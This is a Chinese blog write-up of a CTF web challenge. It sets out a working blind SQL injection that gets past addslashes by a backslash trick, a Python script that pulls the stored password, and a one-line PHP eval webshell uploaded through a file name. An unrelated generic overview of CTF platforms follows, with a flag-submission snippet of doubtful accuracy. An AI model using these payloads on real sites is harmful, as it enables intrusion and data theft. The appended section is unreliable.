一天一道ctf 第49天

在这里插入图片描述
查看源码点击image.php?id=1看一下,不一样的id对应了不一样的图片。
在这里插入图片描述
在这里插入图片描述
robots.txt泄露备份文件,image.php.bak查看源码

include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

addslashes会在单引号,双引号,反斜杠前面加一个/来转义。然后经过str_replace把\0,500,\','都替换成空。那如果我们输入?id=\0,经过URL第一个\用来转义传进去的id就是\0,然后addslashes又把它变回\0,经过strreplace变成\,就可以把'{$id}'的第二个单引号转义,第一个单引号跟path的第一个单引号闭合。我们可以在path变量里传任何参数执行只要把最后一个单引号闭合了就行。

import  requests

url = "http://8f6bddb9-6974-4f8a-a148-4070a9553a3e.node4.buuoj.cn:81//image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select password from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
    l = 1
    r = 130
    mid = (l + r)>>1
    while(l<r):
        payloads = payload.format(i,mid)
        print(url+payloads)
        html = requests.get(url+payloads)
        if "JFIF" in html.text:
            l = mid +1
        else:
            r = mid
        mid = (l + r)>>1
    result+=chr(mid)
    print(result)

爆一遍username和password,JFIF是图像的一种存储格式。但因为id错误的话什么也不会显示,所以哪怕用’1‘也可以。
登录成功后是一个文件上传页面,你上传的文件名会被登记在如下的php文件里,那我们可以用文件名写一句话木马,然后用蚁剑连接这个php文件。在这里插入图片描述
php被过滤了,所以要把<?php @eval($_POST['hack']);?>改成<?=@eval($_POST['hack']);?>。上传成功后蚁剑连接

http://8f6bddb9-6974-4f8a-a148-4070a9553a3e.node4.buuoj.cn:81/logs/upload.c197fa5bd8827307f85d3b918516bf36.log.php

在这里插入图片描述
在这里插入图片描述

### CTF 竞赛平台概述 CTF 是一个专注于网络安全竞技的比赛平台,旨在提升参赛者的实际操作能力和技术水平。该平台提供了一个模拟真实世界网络攻击环境的舞台,让参与者能够通过解决各种类型的挑战来提高自己的技能[^1]。 ### Web 使用指南 #### 注册与登录 为了参加比赛,用户需先注册账号并完成身份验证过程。成功创建账户后即可登录到个人主页,在这里可以查看即将举行的活动列表和个人资料设置选项。 #### 浏览赛事信息 进入首页后可以看到不同类别的竞赛项目链接,点击感兴趣的类别可进一步了解具体详情,包括但不限于比赛规则说明文档下载地址、官方交流群二维码等重要资源位置指引。 #### 提交Flag获取分数 当选手解答出一道题目之后,需要按照指定格式提交flag给系统进行校验;如果正确则会立即更新排行榜上的成绩情况,并解锁下一阶段更难的任务等待挑战者继续攻克难关。 ```python def submit_flag(flag): """ Submit the flag to get points. Args: flag (str): The answer string of a challenge question Returns: bool: True if submission is successful, False otherwise """ try: response = requests.post('https://tianshou.ctftime.org/api/v1/challenges/submit', json={'answer': flag}) if response.status_code == 200 and 'success' in response.json(): return True except Exception as e: print(f"Error occurred while submitting flag: {e}") return False ``` ### 参赛经验分享 对于初次接触此类活动的新手来说,建议多花些时间熟悉各类工具和技术知识点,比如掌握常见的漏洞检测方法论以及修复措施。同时积极参与社区讨论区内的问答互动环节也是快速成长的有效途径之一。另外值得注意的是团队协作精神同样至关重要——合理分工合作往往能带来意想不到的效果! - **持续学习**:不断积累理论基础的同时也要注重实践能力培养; - **善于总结归纳**:每次赛后都要认真反思整个解题思路流程中的优缺点所在以便日后改进优化; - **保持良好心态**:面对困难时不轻易放弃而是积极寻求解决方案直至最终胜利为止。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值